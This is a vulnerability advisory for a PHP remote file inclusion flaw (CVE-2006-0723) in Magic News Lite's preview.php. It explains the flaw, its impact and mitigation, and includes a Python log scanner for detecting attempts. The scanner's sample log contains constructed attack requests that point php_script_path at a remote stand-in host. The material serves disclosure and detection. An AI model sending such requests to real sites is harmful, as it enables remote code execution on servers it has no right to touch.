CVE-2006-0723 in Magic News Lite

Summary

by MITRE

PHP remote file inclusion vulnerability in preview.php in Reamday Enterprises Magic News Lite 1.2.3, when register_globals is enabled, allows remote attackers to include arbitrary files via a URL in the php_script_path parameter.


Analysis

by VulDB Data Team • 08/05/2017

The vulnerability identified as CVE-2006-0723 represents a critical remote file inclusion flaw in the Magic News Lite 1.2.3 content management system developed by Reamday Enterprises. This security weakness stems from improper input validation and unsafe file handling practices within the preview.php script, which processes user-supplied parameters without adequate sanitization. The vulnerability specifically manifests when the PHP configuration enables the register_globals directive, a deprecated feature that automatically creates global variables from request parameters, significantly expanding the attack surface for malicious actors.

The technical flaw resides in the insecure handling of the php_script_path parameter within the preview.php file, where user-controllable input directly influences the file inclusion mechanism. When register_globals is enabled, attacker-controlled variables become accessible as global PHP variables, allowing malicious users to manipulate the script execution flow by injecting malicious URLs into the php_script_path parameter. This creates a pathway for remote code execution through arbitrary file inclusion attacks, where attackers can load and execute malicious PHP scripts hosted on remote servers. The vulnerability operates under CWE-98, which classifies improper input validation leading to remote file inclusion, and aligns with ATT&CK technique T1190 for exploitation of remote services.

The operational impact of this vulnerability extends beyond simple data compromise, as it enables attackers to execute arbitrary code on the target server with the privileges of the web application. This remote code execution capability allows adversaries to establish persistent backdoors, exfiltrate sensitive data, modify website content, or use the compromised server as a launchpad for further attacks within the network infrastructure. The vulnerability is particularly dangerous in environments where the register_globals setting remains enabled, as this configuration significantly reduces the complexity of exploitation. Organizations running Magic News Lite 1.2.3 with this dangerous PHP configuration face substantial risk of full system compromise, data breaches, and potential regulatory violations.

Mitigation strategies for this vulnerability require immediate action to disable the register_globals directive in PHP configuration, which should be enforced at the server level rather than through application code modifications. Security administrators must also implement proper input validation and sanitization for all user-supplied parameters, utilizing parameterized queries and strict type checking to prevent malicious input from influencing file inclusion operations. The recommended approach includes upgrading to a supported version of the Magic News Lite software that addresses this vulnerability, implementing web application firewalls to detect and block malicious file inclusion attempts, and conducting thorough security assessments to identify similar vulnerabilities in other applications. Additionally, organizations should enforce the principle of least privilege for web applications and regularly audit their PHP configurations to ensure deprecated features like register_globals remain disabled.
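
To illustrate the detection side of the mitigation above, the following added example (not code from VulDB, MITRE or the Magic News Lite project) scans web server access-log lines for requests to preview.php whose php_script_path value begins with a URL scheme. The log lines, client addresses and host names are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme prefix (http:, ftp:, php:, data:, ...). Two or more characters,
# so a Windows drive letter such as C: is not mistaken for a scheme.
URL_LIKE = re.compile(r"[a-z][a-z0-9+.\-]+:", re.I)

SAMPLE_LOG = [  # constructed lines using documentation addresses and hosts
    '192.0.2.10 - - [16/Feb/2006:10:00:01 +0000] "GET /news/preview.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Feb/2006:10:00:07 +0000] "GET /news/preview.php?php_script_path=http%3A%2F%2Fhost.example.invalid%2Fa.txt HTTP/1.1" 200 312',
    '192.0.2.45 - - [16/Feb/2006:10:00:09 +0000] "GET /news/preview.php?php.script.path=FTP://host.example.invalid/a HTTP/1.1" 200 312',
    '192.0.2.51 - - [16/Feb/2006:10:00:12 +0000] "GET /news/preview.php?php_script_path=includes/ HTTP/1.1" 200 5090',
    '192.0.2.60 - - [16/Feb/2006:10:00:15 +0000] "GET /index.php?php_script_path=http://host.example.invalid/a HTTP/1.1" 404 0',
]

def php_var_name(name):
    """Normalise a request key the way PHP does before it becomes a variable:
    leading spaces are dropped, dots and spaces become underscores."""
    return name.lstrip(" ").replace(".", "_").replace(" ", "_")

def flag_line(line):
    """Return (client, value) if the line is a preview.php request whose
    php_script_path value starts with a URL scheme, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if "/preview.php" not in target.path.lower():
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = value.strip()  # parse_qsl has already percent-decoded it
        if php_var_name(name) == "php_script_path" and URL_LIKE.match(value):
            return line.split()[0], value
    return None

def scan(lines):
    """Collect every flagged (client, value) pair, in log order."""
    return [hit for hit in map(flag_line, lines) if hit]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"possible RFI attempt from {client}: php_script_path={value}")
```

Access logs record only the query string; with register_globals enabled the same variable can also arrive in a POST body or a cookie, which this check does not see.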

Reservation

02/16/2006

Disclosure

02/16/2006

Moderation

accepted

Entry

VDB-28749

CPE

ready

EPSS

0.01566

KEV

no

Activities

very low
